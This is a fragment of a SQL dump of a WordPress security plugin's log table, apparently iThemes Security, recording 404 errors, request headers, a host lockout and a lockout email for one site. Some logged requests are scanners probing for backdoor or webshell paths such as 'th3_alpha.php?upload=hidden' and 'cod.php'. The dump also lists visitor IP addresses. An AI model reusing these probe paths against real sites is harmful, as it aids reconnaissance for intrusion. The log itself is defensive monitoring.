Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821114.636744022369384765625;s:12:\"REQUEST_TIME\";i:1631821114;}}','notice','2021-09-16 19:38:36','2021-09-16 19:38:34',72643160,72743344,'http://zphiblgz.org/api/common/getConfig',1,0,'101.36.110.241'),(97151,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821128.8026599884033203125;s:12:\"REQUEST_TIME\";i:1631821128;}}','notice','2021-09-16 19:38:50','2021-09-16 19:38:49',72606608,72690448,'http://zphiblgz.org/admin_user/m_tixian.php',1,0,'101.36.110.241'),(97152,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821132.6359279155731201171875;s:12:\"REQUEST_TIME\";i:1631821132;}}','notice','2021-09-16 19:38:53','2021-09-16 19:38:52',72313704,72397544,'http://zphiblgz.org/Home/GetAllGameCategory',1,0,'101.36.110.241'),(97153,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821135.1627109050750732421875;s:12:\"REQUEST_TIME\";i:1631821135;}}','notice','2021-09-16 19:38:57','2021-09-16 19:38:55',72628936,72712704,'http://zphiblgz.org/zz2/address.php?gid=651',1,0,'101.36.110.241'),(97154,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821137.24826908111572265625;s:12:\"REQUEST_TIME\";i:1631821137;}}','notice','2021-09-16 19:38:59','2021-09-16 19:38:57',72643216,72743400,'http://zphiblgz.org/xianyu/index/setp1.html',1,0,'101.36.110.241'),(97155,0,'lockout','host-lockout::101.36.110.241','a:14:{s:6:\"module\";s:12:\"four_oh_four\";s:4:\"host\";s:14:\"101.36.110.241\";s:7:\"user_id\";b:0;s:8:\"username\";b:0;s:14:\"module_details\";a:5:{s:4:\"type\";s:12:\"four_oh_four\";s:6:\"reason\";s:54:\"too many attempts to access a file that does not exist\";s:5:\"label\";s:3:\"404\";s:4:\"host\";i:20;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:12:\"four_oh_four\";s:13:\"lockout_start\";s:19:\"2021-09-16 14:38:57\";s:17:\"lockout_start_gmt\";s:19:\"2021-09-16 19:38:57\";s:15:\"lockout_context\";s:412:\"O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"101.36.110.241\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}\";s:14:\"lockout_expire\";s:19:\"2021-09-16 14:53:57\";s:18:\"lockout_expire_gmt\";s:19:\"2021-09-16 19:53:57\";s:12:\"lockout_host\";s:14:\"101.36.110.241\";}','action','2021-09-16 19:38:59','2021-09-16 19:38:57',72675720,72743400,'http://zphiblgz.org/xianyu/index/setp1.html',1,0,'101.36.110.241'),(97156,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:7:\"subject\";s:40:\"[zphiblgz.org] Site Lockout Notification\";}','debug','2021-09-16 19:38:59','2021-09-16 19:38:57',73127832,73166144,'http://zphiblgz.org/xianyu/index/setp1.html',1,0,'101.36.110.241'),(97157,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631834118.757010936737060546875;s:12:\"REQUEST_TIME\";i:1631834118;}}','notice','2021-09-16 23:15:20','2021-09-16 23:15:18',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.19'),(97158,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.39\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631834519.1810119152069091796875;s:12:\"REQUEST_TIME\";i:1631834519;}}','notice','2021-09-16 23:22:01','2021-09-16 23:21:59',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'45.152.119.142'),(97187,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631928074.76366901397705078125;s:12:\"REQUEST_TIME\";i:1631928074;}}','notice','2021-09-18 01:21:16','2021-09-18 01:21:15',72628344,72712960,'https://zphiblgz.org/cod.php',1,0,'185.191.34.215'),(97058,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631641253.915893077850341796875;s:12:\"REQUEST_TIME\";i:1631641253;}}','notice','2021-09-14 17:40:55','2021-09-14 17:40:54',72673224,72771776,'https://zphiblgz.org/cache/unadjustably/th3_alpha.php?upload=hidden',1,0,'185.191.34.215'),(97057,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:65:\"Mozilla/5.0 (compatible; Konqueror/3.0-rc4; i686 Linux; 20020517)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631638393.4854090213775634765625;s:12:\"REQUEST_TIME\";i:1631638393;}}','notice','2021-09-14 16:53:15','2021-09-14 16:53:13',72629968,72713704,'http://zphiblgz.org/scholarship/application/',1,0,'195.181.167.41'),(97056,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631632569.173593044281005859375;s:12:\"REQUEST_TIME\";i:1631632569;}}','notice','2021-09-14 15:16:12','2021-09-14 15:16:09',72187008,72273432,'https://zphiblgz.org/event/breakfast-on-the-go/',1,0,'40.77.167.88'),(97055,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631629326.171226024627685546875;s:12:\"REQUEST_TIME\";i:1631629326;}}','notice','2021-09-14 14:22:08','2021-09-14 14:22:06',72605416,72689152,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(97053,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631620188.13551998138427734375;s:12:\"REQUEST_TIME\";i:1631620188;}}','notice','2021-09-14 11:49:50','2021-09-14 11:49:48',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.76.35'),(97054,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:52:\"http://www.google.com/url?url=zphiblgz.org&yahoo.com\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631620265.7912509441375732421875;s:12:\"REQUEST_TIME\";i:1631620265;}}','notice','2021-09-14 11:51:07','2021-09-14 11:51:06',72617576,72704840,'https://zphiblgz.org/event/youth-open-house/',1,0,'184.154.76.35'),(97052,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:124:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631590206.347484111785888671875;s:12:\"REQUEST_TIME\";i:1631590206;}}','notice','2021-09-14 03:30:08','2021-09-14 03:30:06',72610064,72697240,'http://zphiblgz.org/event/breakfast-on-the-go',1,0,'35.210.232.207'),(97051,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631583232.4784300327301025390625;s:12:\"REQUEST_TIME\";i:1631583232;}}','notice','2021-09-14 01:33:54','2021-09-14 01:33:52',72605384,72689152,'http://zphiblgz.org/application',1,0,'18.207.108.68'),(96950,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631284700.550220012664794921875;s:12:\"REQUEST_TIME\";i:1631284700;}}','notice','2021-09-10 14:38:22','2021-09-10 14:38:20',72612408,72694752,'https://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(96951,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631290989.17801189422607421875;s:12:\"REQUEST_TIME\";i:1631290989;}}','notice','2021-09-10 16:23:11','2021-09-10 16:23:09',72164360,72248096,'http://zphiblgz.org/events-2/',1,0,'66.249.65.97'),(96952,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631291328.67591190338134765625;s:12:\"REQUEST_TIME\";i:1631291328;}}','notice','2021-09-10 16:28:50','2021-09-10 16:28:48',72761064,72844744,'https://zphiblgz.org/license.php?x=1',1,0,'185.191.34.215'),(96953,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631291878.0508220195770263671875;s:12:\"REQUEST_TIME\";i:1631291878;}}','notice','2021-09-10 16:38:00','2021-09-10 16:37:58',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'142.54.183.90'),(96954,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:199:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631292517.1600530147552490234375;s:12:\"REQUEST_TIME\";i:1631292517;}}','notice','2021-09-10 16:48:39','2021-09-10 16:48:37',72147096,72230336,'https://zphiblgz.org/event/5th-annual-denim-pearlz-party/',1,0,'66.249.65.112'),(96955,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:17:\"mail.zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 